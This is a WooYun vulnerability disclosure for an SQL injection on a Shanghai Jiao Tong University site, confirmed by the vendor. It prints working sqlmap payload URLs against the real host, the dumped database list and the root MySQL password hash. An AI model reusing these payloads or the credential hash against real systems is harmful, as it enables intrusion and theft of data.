当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-094978

漏洞标题:上海交通大学某站root权限sql注入涉及多库

相关厂商:sjtu.edu.cn

漏洞作者: Forever80s

提交时间:2015-02-02 13:07

修复时间:2015-03-19 13:08

公开时间:2015-03-19 13:08

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-02-02: 细节已通知厂商并且等待厂商处理中
2015-02-02: 厂商已经确认,细节仅向厂商公开
2015-02-12: 细节向核心白帽子及相关领域专家公开
2015-02-22: 细节向普通白帽子公开
2015-03-04: 细节向实习白帽子公开
2015-03-19: 细节向公众公开

简要描述:

详细说明:

上海交通大学某站root权限sql注入涉及多库

漏洞证明:

thinkphp的注入,安全不能靠框架,主要看靠程序员
网站 oe.sjtu.edu.cn

http://oe.sjtu.edu.cn/index.php/H
e/article/detailPage/parentID/0/cat_id/1662/artID/1703
arameter: #1*
   Type: boolean-based blind
   Title: AND boolean-based blind - WHERE or HAVING clause
   Payload: http://oe.sjtu.edu.cn:80/index.php/Home/article/detailPage/parentI
0/cat_id/1662/artID/1703 AND 3661=3661
   Type: UNION query
   Title: MySQL UNION query (NULL) - 19 columns
   Payload: http://oe.sjtu.edu.cn:80/index.php/Home/article/detailPage/parentI
0/cat_id/1662/artID/-3770 UNION ALL SELECT NULL,CONCAT(0x3a63756a3a,0x426f486a
544f565067,0x3a6962773a),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NUL
NULL,NULL,NULL,NULL,NULL,NULL#
--
00:50:36] [INFO] the back-end DBMS is MySQL
eb server operating system: Windows Vista
eb application technology: ASP.NET, Microsoft IIS 7.0, PHP 5.2.17
ack-end DBMS: MySQL 5
00:50:36] [INFO] fetching database users
00:50:37] [INFO] the SQL query used returns 25 entries
00:50:37] [INFO] retrieved: "'root'@'localhost'"
00:50:37] [INFO] retrieved: "'root'@'localhost'"
00:50:38] [INFO] retrieved: "'root'@'localhost'"
00:50:38] [INFO] retrieved: "'root'@'localhost'"
00:50:38] [INFO] retrieved: "'root'@'localhost'"
00:50:39] [INFO] retrieved: "'root'@'localhost'"
00:50:39] [INFO] retrieved: "'root'@'localhost'"
00:50:39] [INFO] retrieved: "'root'@'localhost'"
00:50:40] [INFO] retrieved: "'root'@'localhost'"
00:50:40] [INFO] retrieved: "'root'@'localhost'"
00:50:41] [INFO] retrieved: "'root'@'localhost'"
00:50:41] [INFO] retrieved: "'root'@'localhost'"
00:50:41] [INFO] retrieved: "'root'@'localhost'"
00:50:42] [INFO] retrieved: "'root'@'localhost'"
00:50:42] [INFO] retrieved: "'root'@'localhost'"
00:50:42] [INFO] retrieved: "'root'@'localhost'"
00:50:43] [INFO] retrieved: "'root'@'localhost'"
00:50:43] [INFO] retrieved: "'root'@'localhost'"
00:50:43] [INFO] retrieved: "'root'@'localhost'"
00:50:44] [INFO] retrieved: "'root'@'localhost'"
00:50:44] [INFO] retrieved: "'root'@'localhost'"
00:50:44] [INFO] retrieved: "'root'@'localhost'"
00:50:45] [INFO] retrieved: "'root'@'localhost'"
00:50:45] [INFO] retrieved: "'root'@'localhost'"
00:50:45] [INFO] retrieved: "'root'@'localhost'"
atabase management system users [1]:
*] 'root'@'localhost'
00:50:45] [INFO] fetching database users password hashes
00:50:46] [INFO] the SQL query used returns 1 entries
00:50:46] [INFO] writing hashes to file 'c:\docume~1\admini~1\locals~1\temp\sq
aphashes-ox6ete.txt' for eventual further processing with other tools
o you want to perform a dictionary-based attack against retrieved password has
s? [Y/n/q] n
atabase management system users password hashes:
*] root [1]:
   password hash: *6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
00:50:56] [INFO] fetching database names
00:50:57] [INFO] the SQL query used returns 5 entries
00:50:57] [INFO] retrieved: "information_schema"
00:50:57] [INFO] retrieved: "jd"
00:50:58] [INFO] retrieved: "mysql"
00:50:58] [INFO] retrieved: "skl"
00:50:58] [INFO] retrieved: "test"
vailable databases [5]:
*] information_schema
*] jd
*] mysql
*] skl
*] test


修复方案:

开发的懂

版权声明:转载请注明来源 Forever80s@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-02-02 15:21

厂商回复:

谢谢,我们立即处理!

最新状态:

暂无